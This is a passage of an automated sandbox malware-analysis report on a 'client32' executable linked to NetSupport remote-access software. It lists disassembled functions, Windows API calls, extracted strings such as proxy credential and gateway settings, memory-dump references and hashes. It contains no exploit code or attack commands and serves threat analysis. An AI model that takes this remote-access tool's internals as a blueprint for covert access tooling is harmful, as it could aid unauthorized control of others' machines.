                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                                • API String ID: 1428277488-3745656997
                                                                                                • Opcode ID: aa9df746ce16d88ad2490a6b5763401255b1af8d0dd1f8f50bdc232d2b7d8ee6
                                                                                                • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                                                • Opcode Fuzzy Hash: aa9df746ce16d88ad2490a6b5763401255b1af8d0dd1f8f50bdc232d2b7d8ee6
                                                                                                • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                                                Function 110310AC Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 249COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                                • InterlockedExchange.KERNEL32(02128048,00001388,?,?,?,?,?,?,00000050), ref: 110313BA
                                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                                • _sprintf.LIBCMT ref: 11031401
                                                                                                • _setlocale.LIBCMT ref: 1103140B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                                                • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                                                • API String ID: 4242130455-3745656997
                                                                                                • Opcode ID: 5e116aca1680965cd23430a9e3aa85e056c6d5cd92fa3b80df57ee5c7257ff00
                                                                                                • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                                                • Opcode Fuzzy Hash: 5e116aca1680965cd23430a9e3aa85e056c6d5cd92fa3b80df57ee5c7257ff00
                                                                                                • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                                                Function 110287A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                • wsprintfA.USER32 ref: 11028814
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                                • wsprintfA.USER32 ref: 11028891
                                                                                                • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                                • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                • API String ID: 512045693-419896573
                                                                                                • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                                • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                                • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                                Function 69CF33A0 Relevance: 27.6, APIs: 2, Strings: 16, Instructions: 571COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf
                                                                                                • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247
                                                                                                • API String ID: 2111968516-2157635994
                                                                                                • Opcode ID: 7a284482a7ccc8487282383b50822b5404020d19587f7608329e070a4855e9f6
                                                                                                • Instruction ID: ceb213f65c72d0df49a4933eb466fd1ef8b565e60f34fcb569e9a474b36c1ac1
                                                                                                • Opcode Fuzzy Hash: 7a284482a7ccc8487282383b50822b5404020d19587f7608329e070a4855e9f6
                                                                                                • Instruction Fuzzy Hash: 6E22A4B2A00258ABDF24CFA4DC80EEAB7B9BF49344F0485D9E54AA7540E6315F85CF52
                                                                                                Function 110860E0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(PCIINV.DLL), ref: 11086115
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventory,986DAFD2,01F94958,01F94948,?,00000000,1118368C,000000FF,?,11032002,01F94958,00000000,?,?,?), ref: 1108613B
                                                                                                • GetProcAddress.KERNEL32(00000000,Cancel,?,11032002,01F94958,00000000,?,?,?), ref: 1108614F
                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventoryEx,?,11032002,01F94958,00000000,?,?,?), ref: 11086163
                                                                                                • wsprintfA.USER32 ref: 110861EB
                                                                                                • wsprintfA.USER32 ref: 11086202
                                                                                                • wsprintfA.USER32 ref: 11086219
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1108636A
                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D68
                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D7B
                                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?), ref: 11085D8E
                                                                                                  • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,756F1222,?,?,11086390,?,11032002,01F94958,00000000,?,?,?), ref: 11085DA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                • API String ID: 4263811268-2492245516
                                                                                                • Opcode ID: 573fb59633bb56a2c8299e3d27132188e04d1bf9316cd0f099af205f194590a4
                                                                                                • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                                • Opcode Fuzzy Hash: 573fb59633bb56a2c8299e3d27132188e04d1bf9316cd0f099af205f194590a4
                                                                                                • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                                Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenMutexA.KERNEL32 ref: 11030CB3
                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                                • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                • API String ID: 2061479752-1320826866
                                                                                                • Opcode ID: 6260680c8295fa7ccb2814a27d389372e2b98020e96dafc808ef6ff5bc8e6fee
                                                                                                • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                                • Opcode Fuzzy Hash: 6260680c8295fa7ccb2814a27d389372e2b98020e96dafc808ef6ff5bc8e6fee
                                                                                                • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                                Function 11106E70 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(986DAFD2,756F110C,00000000,00000000), ref: 11106E9E
                                                                                                • EnterCriticalSection.KERNEL32(111F160C), ref: 11106EA7
                                                                                                • GetTickCount.KERNEL32 ref: 11106EAD
                                                                                                • GetTickCount.KERNEL32(?,?), ref: 11106F00
                                                                                                • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F09
                                                                                                • GetTickCount.KERNEL32(?,?), ref: 11106F3A
                                                                                                • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F43
                                                                                                • EnterCriticalSection.KERNEL32(111F160C), ref: 11106F6C
                                                                                                • LeaveCriticalSection.KERNEL32(111F160C,00000000,?,00000000), ref: 11107033
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                  • Part of subcall function 110F1080: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106FD7,?), ref: 110F10AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                                • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                • API String ID: 1574099134-3013461081
                                                                                                • Opcode ID: e94ee5592082916c516d858cd08a538ee78f5c592791c6320886d58cb83ba63d
                                                                                                • Instruction ID: b37b6005da44a37f7a6c975450b0fd24ca11ef460d9c524a884b745d5c10ab20
                                                                                                • Opcode Fuzzy Hash: e94ee5592082916c516d858cd08a538ee78f5c592791c6320886d58cb83ba63d
                                                                                                • Instruction Fuzzy Hash: 5B414D7AF0022AABD700DFE59D91FDEFBB8EB46218F50053AF409E7240EA30690487D1
                                                                                                Function 110F6150 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 110F618F
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 110F61D1
                                                                                                • GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110F61DE
                                                                                                • ProcessIdToSessionId.KERNEL32(00000000,00000000), ref: 110F61F0
                                                                                                • SetLastError.KERNEL32(00000078), ref: 110F6203
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 110F620C
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 110F6215
                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,11189C68), ref: 110F6228
                                                                                                • GetTokenInformation.ADVAPI32(11189C68,0000000C(TokenIntegrityLevel),111EA880,00000004,?), ref: 110F6247
                                                                                                • CloseHandle.KERNEL32(11189C68), ref: 110F626A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110F6271
                                                                                                • FreeLibrary.KERNEL32(?), ref: 110F627B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseCurrentHandleLibraryOpenToken$AddressErrorFreeInformationLastLoadProcSession
                                                                                                • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                                • API String ID: 2607481436-2825297712
                                                                                                • Opcode ID: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                                                • Instruction ID: 420031f46cca3c2d8ff2aa46f1ed04d10c13eca04bac1e8faae0ba62584c02a7
                                                                                                • Opcode Fuzzy Hash: e865c6473b299d360233d20d6969acab5fbd0a0a238613220fb6c2a45ad82976
                                                                                                • Instruction Fuzzy Hash: 5C4119B5E416299FDB15DFE9DD89AAEFBB8FB08B04F10052AF421E3644D77099018B90
                                                                                                Function 1102D360 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 289servicesleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,986DAFD2,?,00000000,00000000), ref: 1102D594
                                                                                                • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                                • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                                • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                                • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                • API String ID: 83693535-1096744297
                                                                                                • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                                • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                                Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                                • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                                • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                                  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                                • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
